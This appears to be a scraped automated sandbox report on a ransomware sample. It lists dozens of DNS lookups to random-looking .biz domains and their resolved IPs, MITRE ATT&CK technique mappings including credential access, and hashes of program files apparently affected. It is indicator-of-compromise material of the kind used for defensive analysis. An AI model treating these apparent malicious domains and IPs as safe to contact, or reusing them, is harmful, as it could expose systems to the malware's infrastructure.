54.80.154.23
8.8.8.8:53

banwyw.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

112 B
144 B
2
2

DNS Request

banwyw.biz

DNS Request

banwyw.biz

DNS Response

3.237.86.197

DNS Response

3.237.86.197
8.8.8.8:53

mgmsclkyu.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

59 B
75 B
1
1

DNS Request

mgmsclkyu.biz

DNS Response

34.246.200.160
8.8.8.8:53

muapr.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

110 B
234 B
2
2

DNS Request

muapr.biz

DNS Request

muapr.biz
8.8.8.8:53

wxgzshna.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

58 B
131 B
1
1

DNS Request

wxgzshna.biz
8.8.8.8:53

zrlssa.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

112 B
144 B
2
2

DNS Request

zrlssa.biz

DNS Request

zrlssa.biz

DNS Response

3.237.86.197

DNS Response

3.237.86.197
8.8.8.8:53

warkcdu.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

114 B
146 B
2
2

DNS Request

warkcdu.biz

DNS Request

warkcdu.biz

DNS Response

18.141.10.107

DNS Response

18.141.10.107
8.8.8.8:53

jlqltsjvh.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

59 B
75 B
1
1

DNS Request

jlqltsjvh.biz

DNS Response

18.141.10.107
8.8.8.8:53

gcedd.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

55 B
71 B
1
1

DNS Request

gcedd.biz

DNS Response

13.251.16.150
8.8.8.8:53

xyrgy.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

55 B
71 B
1
1

DNS Request

xyrgy.biz

DNS Response

54.80.154.23
8.8.8.8:53

htwqzczce.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

59 B
107 B
1
1

DNS Request

htwqzczce.biz

DNS Response

44.208.124.139

34.193.97.35

54.157.24.8
8.8.8.8:53

139.124.208.44.in-addr.arpa

dns

146 B
258 B
2
2

DNS Request

139.124.208.44.in-addr.arpa

DNS Request

139.124.208.44.in-addr.arpa
8.8.8.8:53

kvbjaur.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

114 B
146 B
2
2

DNS Request

kvbjaur.biz

DNS Request

kvbjaur.biz

DNS Response

54.244.188.177

DNS Response

54.244.188.177
8.8.8.8:53

jwkoeoqns.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

118 B
150 B
2
2

DNS Request

jwkoeoqns.biz

DNS Request

jwkoeoqns.biz

DNS Response

18.208.156.248

DNS Response

18.208.156.248
8.8.8.8:53

xccjj.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

110 B
142 B
2
2

DNS Request

xccjj.biz

DNS Request

xccjj.biz

DNS Response

44.213.104.86

DNS Response

44.213.104.86
8.8.8.8:53

uphca.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

55 B
71 B
1
1

DNS Request

uphca.biz

DNS Response

44.221.84.105
8.8.8.8:53

hehckyov.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

58 B
74 B
1
1

DNS Request

hehckyov.biz

DNS Response

44.221.84.105
8.8.8.8:53

fjumtfnz.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

58 B
74 B
1
1

DNS Request

fjumtfnz.biz

DNS Response

34.211.97.45
8.8.8.8:53

rynmcq.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

56 B
72 B
1
1

DNS Request

rynmcq.biz

DNS Response

54.244.188.177
8.8.8.8:53

hlzfuyy.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

114 B
146 B
2
2

DNS Request

hlzfuyy.biz

DNS Request

hlzfuyy.biz

DNS Response

34.211.97.45

DNS Response

34.211.97.45
8.8.8.8:53

uaafd.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

110 B
142 B
2
2

DNS Request

uaafd.biz

DNS Request

uaafd.biz

DNS Response

3.254.94.185

DNS Response

3.254.94.185
8.8.8.8:53

eufxebus.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

58 B
90 B
1
1

DNS Request

eufxebus.biz

DNS Response

107.178.223.183

104.155.138.21
8.8.8.8:53

rffxu.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

55 B
71 B
1
1

DNS Request

rffxu.biz

DNS Response

34.246.200.160
8.8.8.8:53

cikivjto.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

58 B
74 B
1
1

DNS Request

cikivjto.biz

DNS Response

44.213.104.86
8.8.8.8:53

qncdaagct.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

118 B
150 B
2
2

DNS Request

qncdaagct.biz

DNS Request

qncdaagct.biz

DNS Response

34.218.204.173

DNS Response

34.218.204.173
8.8.8.8:53

shpwbsrw.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

58 B
74 B
1
1

DNS Request

shpwbsrw.biz

DNS Response

13.251.16.150
8.8.8.8:53

cjvgcl.biz

dns

DiagnosticsHub.StandardCollector.Service.exe

56 B
72 B
1
1

DNS Request

cjvgcl.biz

DNS Response

54.80.154.23
8.8.8.8:53

neazudmrq.biz

dns

DiagnosticsHub.StandardCollector.Service.exe

118 B
150 B
2
2

DNS Request

neazudmrq.biz

DNS Request

neazudmrq.biz

DNS Response

3.237.86.197

DNS Response

3.237.86.197
8.8.8.8:53

pgfsvwx.biz

dns

DiagnosticsHub.StandardCollector.Service.exe

57 B
73 B
1
1

DNS Request

pgfsvwx.biz

DNS Response

54.80.154.23
8.8.8.8:53

aatcwo.biz

dns

DiagnosticsHub.StandardCollector.Service.exe

112 B
144 B
2
2

DNS Request

aatcwo.biz

DNS Request

aatcwo.biz

DNS Response

34.218.204.173

DNS Response

34.218.204.173
8.8.8.8:53

kcyvxytog.biz

dns

DiagnosticsHub.StandardCollector.Service.exe

59 B
75 B
1
1

DNS Request

kcyvxytog.biz

DNS Response

18.208.156.248
8.8.8.8:53

nwdnxrd.biz

dns

DiagnosticsHub.StandardCollector.Service.exe

57 B
73 B
1
1

DNS Request

nwdnxrd.biz

DNS Response

54.244.188.177
8.8.8.8:53

ereplfx.biz

dns

DiagnosticsHub.StandardCollector.Service.exe

114 B
146 B
2
2

DNS Request

ereplfx.biz

DNS Request

ereplfx.biz

DNS Response

44.213.104.86

DNS Response

44.213.104.86
8.8.8.8:53

ptrim.biz

dns

DiagnosticsHub.StandardCollector.Service.exe

55 B
71 B
1
1

DNS Request

ptrim.biz

DNS Response

18.141.10.107
8.8.8.8:53

znwbniskf.biz

dns

DiagnosticsHub.StandardCollector.Service.exe

118 B
150 B
2
2

DNS Request

znwbniskf.biz

DNS Request

znwbniskf.biz

DNS Response

34.218.204.173

DNS Response

34.218.204.173
8.8.8.8:53

cpclnad.biz

dns

DiagnosticsHub.StandardCollector.Service.exe

114 B
146 B
2
2

DNS Request

cpclnad.biz

DNS Request

cpclnad.biz

DNS Response

3.237.86.197

DNS Response

3.237.86.197
8.8.8.8:53

mjheo.biz

dns

DiagnosticsHub.StandardCollector.Service.exe

55 B
71 B
1
1

DNS Request

mjheo.biz

DNS Response

3.237.86.197
8.8.8.8:53

pwlqfu.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

56 B
72 B
1
1

DNS Request

pwlqfu.biz

DNS Response

34.246.200.160
8.8.8.8:53

wluwplyh.biz

dns

DiagnosticsHub.StandardCollector.Service.exe

116 B
148 B
2
2

DNS Request

wluwplyh.biz

DNS Request

wluwplyh.biz

DNS Response

18.141.10.107

DNS Response

18.141.10.107
8.8.8.8:53

rrqafepng.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

118 B
150 B
2
2

DNS Request

rrqafepng.biz

DNS Response

44.200.43.61

DNS Request

rrqafepng.biz

DNS Response

44.200.43.61
8.8.8.8:53

ctdtgwag.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

58 B
74 B
1
1

DNS Request

ctdtgwag.biz

DNS Response

3.94.10.34
8.8.8.8:53

tnevuluw.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

116 B
148 B
2
2

DNS Request

tnevuluw.biz

DNS Request

tnevuluw.biz

DNS Response

35.164.78.200

DNS Response

35.164.78.200
8.8.8.8:53

whjovd.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

112 B
144 B
2
2

DNS Request

whjovd.biz

DNS Request

whjovd.biz

DNS Response

18.141.10.107

DNS Response

18.141.10.107
8.8.8.8:53

zgapiej.biz

dns

DiagnosticsHub.StandardCollector.Service.exe

114 B
146 B
2
2

DNS Request

zgapiej.biz

DNS Request

zgapiej.biz

DNS Response

18.208.156.248

DNS Response

18.208.156.248
8.8.8.8:53

jifai.biz

dns

DiagnosticsHub.StandardCollector.Service.exe

55 B
71 B
1
1

DNS Request

jifai.biz

DNS Response

44.221.84.105
8.8.8.8:53

xnxvnn.biz

dns

DiagnosticsHub.StandardCollector.Service.exe

56 B
88 B
1
1

DNS Request

xnxvnn.biz

DNS Response

107.178.223.183

104.155.138.21
8.8.8.8:53

ihcnogskt.biz

dns

DiagnosticsHub.StandardCollector.Service.exe

59 B
75 B
1
1

DNS Request

ihcnogskt.biz

DNS Response

35.164.78.200
8.8.8.8:53

gjogvvpsf.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

59 B
75 B
1
1

DNS Request

gjogvvpsf.biz

DNS Response

208.100.26.245
8.8.8.8:53

kkqypycm.biz

dns

DiagnosticsHub.StandardCollector.Service.exe

58 B
74 B
1
1

DNS Request

kkqypycm.biz

DNS Response

18.141.10.107
8.8.8.8:53

reczwga.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

57 B
73 B
1
1

DNS Request

reczwga.biz

DNS Response

3.237.86.197
8.8.8.8:53

bghjpy.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

112 B
144 B
2
2

DNS Request

bghjpy.biz

DNS Request

bghjpy.biz

DNS Response

34.211.97.45

DNS Response

34.211.97.45
8.8.8.8:53

damcprvgv.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

59 B
75 B
1
1

DNS Request

damcprvgv.biz

DNS Response

54.80.154.23
8.8.8.8:53

ocsvqjg.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

57 B
73 B
1
1

DNS Request

ocsvqjg.biz

DNS Response

3.254.94.185
8.8.8.8:53

uevrpr.biz

dns

DiagnosticsHub.StandardCollector.Service.exe

56 B
72 B
1
1

DNS Request

uevrpr.biz

DNS Response

44.213.104.86
8.8.8.8:53

ywffr.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

55 B
71 B
1
1

DNS Request

ywffr.biz

DNS Response

54.244.188.177
8.8.8.8:53

fgajqjyhr.biz

dns

DiagnosticsHub.StandardCollector.Service.exe

59 B
75 B
1
1

DNS Request

fgajqjyhr.biz

DNS Response

34.211.97.45
8.8.8.8:53

ecxbwt.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

56 B
72 B
1
1

DNS Request

ecxbwt.biz

DNS Response

54.244.188.177
8.8.8.8:53

hagujcj.biz

dns

DiagnosticsHub.StandardCollector.Service.exe

114 B
146 B
2
2

DNS Request

hagujcj.biz

DNS Request

hagujcj.biz

DNS Response

18.208.156.248

DNS Response

18.208.156.248
8.8.8.8:53

sctmku.biz

dns

DiagnosticsHub.StandardCollector.Service.exe

56 B
72 B
1
1

DNS Request

sctmku.biz

DNS Response

35.164.78.200
8.8.8.8:53

pectx.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

55 B
71 B
1
1

DNS Request

pectx.biz

DNS Response

44.213.104.86
8.8.8.8:53

zyiexezl.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

58 B
74 B
1
1

DNS Request

zyiexezl.biz

DNS Response

54.80.154.23
8.8.8.8:53

cwyfknmwh.biz

dns

DiagnosticsHub.StandardCollector.Service.exe

59 B
121 B
1
1

DNS Request

cwyfknmwh.biz
8.8.8.8:53

qcrsp.biz

dns

DiagnosticsHub.StandardCollector.Service.exe

110 B
142 B
2
2

DNS Request

qcrsp.biz

DNS Request

qcrsp.biz

DNS Response

34.211.97.45

DNS Response

34.211.97.45
8.8.8.8:53

banwyw.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

56 B
72 B
1
1

DNS Request

banwyw.biz

DNS Response

3.237.86.197
8.8.8.8:53

muapr.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

110 B
234 B
2
2

DNS Request

muapr.biz

DNS Request

muapr.biz
8.8.8.8:53

wxgzshna.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

58 B
131 B
1
1

DNS Request

wxgzshna.biz
8.8.8.8:53

zrlssa.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

56 B
72 B
1
1

DNS Request

zrlssa.biz

DNS Response

3.237.86.197
8.8.8.8:53

sewlqwcd.biz

dns

DiagnosticsHub.StandardCollector.Service.exe

58 B
74 B
1
1

DNS Request

sewlqwcd.biz

DNS Response

3.237.86.197
8.8.8.8:53

jlqltsjvh.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

59 B
75 B
1
1

DNS Request

jlqltsjvh.biz

DNS Response

18.141.10.107
8.8.8.8:53

dyjdrp.biz

dns

DiagnosticsHub.StandardCollector.Service.exe

112 B
144 B
2
2

DNS Request

dyjdrp.biz

DNS Request

dyjdrp.biz

DNS Response

54.244.188.177

DNS Response

54.244.188.177
8.8.8.8:53

napws.biz

dns

DiagnosticsHub.StandardCollector.Service.exe

55 B
71 B
1
1

DNS Request

napws.biz

DNS Response

35.164.78.200
8.8.8.8:53

qvuhsaqa.biz

dns

DiagnosticsHub.StandardCollector.Service.exe

116 B
148 B
2
2

DNS Request

qvuhsaqa.biz

DNS Request

qvuhsaqa.biz

DNS Response

54.244.188.177

DNS Response

54.244.188.177
8.8.8.8:53

xyrgy.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

55 B
71 B
1
1

DNS Request

xyrgy.biz

DNS Response

54.80.154.23
8.8.8.8:53

htwqzczce.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

118 B
214 B
2
2

DNS Request

htwqzczce.biz

DNS Request

htwqzczce.biz

DNS Response

44.208.124.139

54.157.24.8

34.193.97.35

DNS Response

34.193.97.35

54.157.24.8

44.208.124.139
8.8.8.8:53

apzzls.biz

dns

DiagnosticsHub.StandardCollector.Service.exe

56 B
72 B
1
1

DNS Request

apzzls.biz

DNS Response

34.211.97.45
8.8.8.8:53

krnsmlmvd.biz

dns

DiagnosticsHub.StandardCollector.Service.exe

118 B
150 B
2
2

DNS Request

krnsmlmvd.biz

DNS Request

krnsmlmvd.biz

DNS Response

34.218.204.173

DNS Response

34.218.204.173
8.8.8.8:53

nlscndwp.biz

dns

DiagnosticsHub.StandardCollector.Service.exe

58 B
74 B
1
1

DNS Request

nlscndwp.biz

DNS Response

54.244.188.177
8.8.8.8:53

bzkysubds.biz

dns

DiagnosticsHub.StandardCollector.Service.exe

59 B
75 B
1
1

DNS Request

bzkysubds.biz

DNS Response

3.94.10.34
8.8.8.8:53

ltpqsnu.biz

dns

DiagnosticsHub.StandardCollector.Service.exe

57 B
73 B
1
1

DNS Request

ltpqsnu.biz

DNS Response

54.80.154.23
8.8.8.8:53

vnvbt.biz

dns

DiagnosticsHub.StandardCollector.Service.exe

110 B
142 B
2
2

DNS Request

vnvbt.biz

DNS Request

vnvbt.biz

DNS Response

44.213.104.86

DNS Response

44.213.104.86
8.8.8.8:53

ypituyqsq.biz

dns

DiagnosticsHub.StandardCollector.Service.exe

59 B
75 B
1
1

DNS Request

ypituyqsq.biz

DNS Response

3.94.10.34
8.8.8.8:53

ijnmvqa.biz

dns

DiagnosticsHub.StandardCollector.Service.exe

57 B
73 B
1
1

DNS Request

ijnmvqa.biz

DNS Response

35.164.78.200
8.8.8.8:53

tltxn.biz

dns

DiagnosticsHub.StandardCollector.Service.exe

55 B
71 B
1
1

DNS Request

tltxn.biz

DNS Response

54.80.154.23
8.8.8.8:53

vgypotwp.biz

dns

DiagnosticsHub.StandardCollector.Service.exe

58 B
74 B
1
1

DNS Request

vgypotwp.biz

DNS Response

54.244.188.177
8.8.8.8:53

kvbjaur.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

57 B
73 B
1
1

DNS Request

kvbjaur.biz

DNS Response

54.244.188.177
8.8.8.8:53

giliplg.biz

dns

DiagnosticsHub.StandardCollector.Service.exe

114 B
146 B
2
2

DNS Request

giliplg.biz

DNS Request

giliplg.biz

DNS Response

44.213.104.86

DNS Response

44.213.104.86
8.8.8.8:53

pywolwnvd.biz

dns

DiagnosticsHub.StandardCollector.Service.exe

59 B
75 B
1
1

DNS Request

pywolwnvd.biz

DNS Response

54.244.188.177
8.8.8.8:53

ssbzmoy.biz

dns

DiagnosticsHub.StandardCollector.Service.exe

57 B
73 B
1
1

DNS Request

ssbzmoy.biz

DNS Response

18.141.10.107
8.8.8.8:53

uphca.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

55 B
71 B
1
1

DNS Request

uphca.biz

DNS Response

44.221.84.105
8.8.8.8:53

fjumtfnz.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

58 B
74 B
1
1

DNS Request

fjumtfnz.biz

DNS Response

34.211.97.45
8.8.8.8:53

cvgrf.biz

dns

DiagnosticsHub.StandardCollector.Service.exe

55 B
71 B
1
1

DNS Request

cvgrf.biz

DNS Response

54.244.188.177
8.8.8.8:53

hlzfuyy.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

57 B
73 B
1
1

DNS Request

hlzfuyy.biz

DNS Response

34.211.97.45
8.8.8.8:53

npukfztj.biz

dns

DiagnosticsHub.StandardCollector.Service.exe

116 B
148 B
2
2

DNS Request

npukfztj.biz

DNS Request

npukfztj.biz

DNS Response

44.221.84.105

DNS Response

44.221.84.105
8.8.8.8:53

rffxu.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

55 B
71 B
1
1

DNS Request

rffxu.biz

DNS Response

34.246.200.160
8.8.8.8:53

przvgke.biz

dns

DiagnosticsHub.StandardCollector.Service.exe

114 B
210 B
2
2

DNS Request

przvgke.biz

DNS Request

przvgke.biz

DNS Response

44.208.124.139

34.193.97.35

54.157.24.8

DNS Response

44.208.124.139

34.193.97.35

54.157.24.8
8.8.8.8:53

cikivjto.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

58 B
74 B
1
1

DNS Request

cikivjto.biz

DNS Response

44.213.104.86
8.8.8.8:53

qncdaagct.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

59 B
75 B
1
1

DNS Request

qncdaagct.biz

DNS Response

34.218.204.173
8.8.8.8:53

zlenh.biz

dns

DiagnosticsHub.StandardCollector.Service.exe

55 B
117 B
1
1

DNS Request

zlenh.biz
8.8.8.8:53

knjghuig.biz

dns

DiagnosticsHub.StandardCollector.Service.exe

116 B
148 B
2
2

DNS Request

knjghuig.biz

DNS Request

knjghuig.biz

DNS Response

18.141.10.107

DNS Response

18.141.10.107
8.8.8.8:53

shpwbsrw.biz

dns

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

58 B
90 B
1
1

DNS Request

shpwbsrw.biz

DNS Response

107.178.223.183

104.155.138.21
8.8.8.8:53

uhxqin.biz

dns

DiagnosticsHub.StandardCollector.Service.exe

56 B
118 B
1
1

DNS Request

uhxqin.biz
8.8.8.8:53

anpmnmxo.biz

dns

DiagnosticsHub.StandardCollector.Service.exe

58 B
120 B
1
1

DNS Request

anpmnmxo.biz

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\elevation_service.exe

Filesize
2.1MB

MD5
9110252242b85ca7502a880635ae9668

SHA1
439058a5c77252b9955935c20cbb3b2e3ea8785a

SHA256
0a0911092681aeefa4a5d061fbe6ed4311b9b13c7fd086ee139be97400acad89

SHA512
f4b7aa3b0233c73d035916d0db850b3985054702b0938b25b206346f9e580cdda86caea8d9d9735528882e3cf5ee68487eff7a31b346a3289d98eeb0b6900de8

Download Submit
C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

Filesize
797KB

MD5
32736a161386d7278b09dde0b169aee5

SHA1
a6f273e4833d0deb7911cc6276cc260192dbeeab

SHA256
f076d7c92bfac1a9bb3d346f5177f97aee0e28c00b9d25db5a7e6fc7f3f6349e

SHA512
045f3191c9ea161dca3b57e82f374787209bf2d0515fd91f7e56e737dfb3e914f59bb076598c405caa5471e5e2f2369c84811666a5ecae5978a0a43b83199393

Download Submit
C:\Program Files\7-Zip\7z.exe

Filesize
1.1MB

MD5
8d0c6547b3dac8ec7956c37b0480a547

SHA1
6bf7065cad8452ee6db3134eb35f1031d956cdfb

SHA256
673e8ec6026c153135c31c9d178a14b0cefeb5b2c0bdcdabfa54a3cbbeaaa1d3

SHA512
50a904f7a6dbefec9750f6f9c8eea6424067804f553cc3520a675915d2db901073497160b167d06768623aad868c5c4f0a802e5faea4faf96f2c7985029c485f

Download Submit
C:\Program Files\7-Zip\7zFM.exe

Filesize
1.5MB

MD5
4ad18b249e67a6cd5271742107c66055

SHA1
0378cc8dbc7d73ed4b09395893c7409acdf145c0

SHA256
241e8e40d95c7f8842b7ac6b5dc7086d59b63dfbff76d3ea9f1020672ad83d6c

SHA512
913717bfc71614acdb17086c01e76973181582f056ca0d9ba236d5ad010857810b209508ca52f52234d532726a9ec0959746bd2b2776d5d5c5ed6a81845815f7

Download Submit
C:\Program Files\7-Zip\7zG.exe

Filesize
1.2MB

MD5
263ecb819156921fc5e5cd61fc721d6e

SHA1
e7de7ced7d5bdd8ee3562bdb776e4e6f4c29858e

SHA256
75f84a00b9862c6352809a70cee43764f8eee0f90c2a2880d299de7560f41bf5

SHA512
2f0472a50b80051f2b07fba4c5c9dbbb8139ba349de46079249d68158979379dd02d22919027e3216b021cb186e200fcfc7974aa224492aa0b657e0635db5086

Download Submit
C:\Program Files\7-Zip\Uninstall.exe

Filesize
582KB

MD5
6a2dc4d5d4c49eaa3e3c74bdd4225b52

SHA1
93d0a4d38b6bbe1eb8e9b34adfb1d89b436f98b6

SHA256
b2baedacf5bd8c533f6f9345d14e3705535e0749335575b51830b912fd74095f

SHA512
abdeabf7c66ca482c8f7659b093eb5eb67c7f417e0a81e6e0d532bcf3f71a32d9350c8bba516ea339e73f1c9b2f6862f457130a38dbbffad96a30841c84d49a9

Download Submit
C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe

Filesize
840KB

MD5
5f1f618f39c2c1ca584bed5e7a61622c

SHA1
20faf9fc16d5e688a1b27e977fb65e9f58f52813

SHA256
432c2ddcf9f505e8fb76004530b9b499aaf9c62535b0203b941f6046e4a9b749

SHA512
b8c42d156a1a946555869e425807b65d986d63819828915981812203ac653224091c06449a42a8b923f836c759660d3d37a34668b5c3313d3cd9f3328c73a8a3

Download Submit
C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe

Filesize
4.6MB

MD5
09e166efdff4f7b19ff53c4872165b1a

SHA1
42dea0a75db292abf25724e978555092f2ae5bbd

SHA256
291a8406fc979ea39b0e7b31c268587c832c209df5e24a649e31b3f24b9feac1

SHA512
e22291af2943d56c543811479f51b3b393254d9b222fbaea95893586b39f14365203c0c02402aa8376ac6e7f06709270a0b8668a14348c61ef82735643ca63ae

Download Submit
C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe

Filesize
910KB

MD5
27827d42c1ae15af7970ba5743b0b402

SHA1
591b319da89f3b6bdffe97b4dc89d0d274482c30

SHA256
a0dc2435a2f4f84065aeeb066f0c6c18c56c5d6de72fd2b9fa591a2bbf6413fb

SHA512
265cd2c023bd486e79b6dc4bed4f4f44e2628282d8e18687fbf931bbb074b26dae1a41384c08bbd20bb80216775f897f103ec791e59fcb72aaff9c0427eadb3f

Download Submit
C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe

Filesize
24.0MB

MD5
76d1c4f97259370ee3fa7d02086a69f4

SHA1
033c0d5cb685d5e336d638ea6da3e78e1f8d2dca

SHA256
a9e2c57075082e370b0bdb50d096f62243fe0260efafb002de7c697c45f7996d

SHA512
d151854503624cba83628af11ed3deea9375a9e93ca5ce191bac64f3007744ec55dda5a912a2feda0cb964c39fcc933226d377b89a715df16416bd7c611f7f98

Download Submit
C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe

Filesize
2.7MB

MD5
b87467a66db39c0b2c27b8311c43e32a

SHA1
35cbca17dc9ee6ad2a4e461f1bf891e109fde9ba

SHA256
c825d85197d73ccd9ac6c1dd274d526f680fb0c1a3cd8e98588bee8a42a8d291

SHA512
464d1b8392e30ab2cd500b0272f3482e65a0c5da8f7ced9a39c5431402d62d5ad200153a95032a6f2c6948720ec447132fa3cf488b6724daf180277706b1bb35

Download Submit
C:\Program Files\Common Files\microsoft shared\OFFICE16\LICLUA.EXE

Filesize
1.1MB

MD5
c302071576a4268f7b79e4f8652d6a8a

SHA1
ef33b02ff773bd95348d4ce175f5badcb4be14fe

SHA256
a8b20dbbd5ecdc9f4b5f33190f0a551d6befe455173d8cf3454176ea1d48bbd9

SHA512
25b3566ef5551d10be6ad494ece474533153fc3f2ecc687b50dd130ca5dced761c180bdf182be14d078fc8d66d29397336943028e5c85f02dd971e1d0ba86629

Download Submit
C:\Program Files\Common Files\microsoft shared\Source Engine\OSE.EXE

Filesize
805KB

MD5
0c9f32694b2109887eeb11841b8abf8f

SHA1
638d746be081efb7ea6945d886c872ed02ec9eef

SHA256
07dcb90f3a6037afc3cc63712f22c150c3267dc77bbbd3ef815f13335f3a2137

SHA512
055f321675f1d0275b5a96e56189c3dd116d5c1ed256bd6fd5891cb898e77cffbfadf4860cdd5fdc9e9e8c8a11036def0014bfd4dfdc43b8577430ebc863a2bb

Download Submit
C:\Program Files\Common Files\microsoft shared\VSTO\10.0\VSTOInstaller.exe

Filesize
656KB

MD5
a72162cb58ac55dcc22cdd62bb6a65f0

SHA1
8d63a4ed8a94bc62981e01a6a584dcc2440da4fc

SHA256
7105ea4571454f9ff31f2b8e33f5a7bccd961551b2d4f5f80c6a211525af51ca

SHA512
b5d59a79d870fb2f14464e7212ba6821e8f469d601ab480e2c95cce174b7fd2494eff7231d97cc182eaa857e5ccc34469304eea6c6c0c8084e8844828aa687e3

Download Submit
C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\chrmstp.exe

Filesize
5.4MB

MD5
97151c5e67d8ce7fb66b0f8a50b7f594

SHA1
f7fd70221596d4e037268d5e3c6ac67c8a9a252c

SHA256
fa511747aac0cc625bf3f498ad4c2bb79daa6e5ab95eccc8d41bc4846a4601bd

SHA512
563d28c3d1286833d524c3582fd1d51e26a69206ac5774594866a44011b3349027068b3d704d2e2b1526c85fbe670e83b8e0a891690f82f8e1cd267615ed3571

Download Submit
C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe

Filesize
5.4MB

MD5
9ca6adae0a64f93c11c57f0461efe041

SHA1
ce1f24b0f415aa432ce8cfa81e1163fde3ea5779

SHA256
3ed8fcbcfefbdf9046fdf5784ffa4b0768bdfcc026b51f6640496993e9e3e6fd

SHA512
300b75e0c161783b10e0e6fa348891ef876081fbb56720d542edf25004787d93cd9c13e3b43a0523ced771d95c1ebb2ed21b7341a847867079babdad0efaebfe

Download Submit
C:\Program Files\Google\Chrome\Application\110.0.5481.104\chrome_pwa_launcher.exe

Filesize
2.0MB

MD5
9ac256255296be05aac410b83a24b345

SHA1
4c701d7f9e0b80def2535fef447e85228ea900fe

SHA256
fb1969f5cf75d65f57df4939c26051bcf4a994c7e25c8fadadbab5825c3965b3

SHA512
aeef3a4e2a9e9717ab267484c4a54fc534f986d65a125da091f3ec11bd54c49bc493b7f512daf37e5e2f082089f39b8174cc8564da6e929551e04b6213a79a9d

Download Submit
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe

Filesize
2.2MB

MD5
5f885ee5713475d00c8338c104467e00

SHA1
e8bf2b806f3d23e3fe545c1df51d08d82c0f82e8

SHA256
9c83f8381b6a71c4daf67685398213ede25e8df9654651209e0519accdf139d0

SHA512
e4a9529a0eb0724d11fde5a46fd4cc2c0546551ddade095fbc2d45739cc5b9756a0a3c209180c19d0d252efd90b43ac74f4c9f69965f5b48a0c1e8964ad405d7

Download Submit
C:\Program Files\Google\Chrome\Application\110.0.5481.104\notification_helper.exe

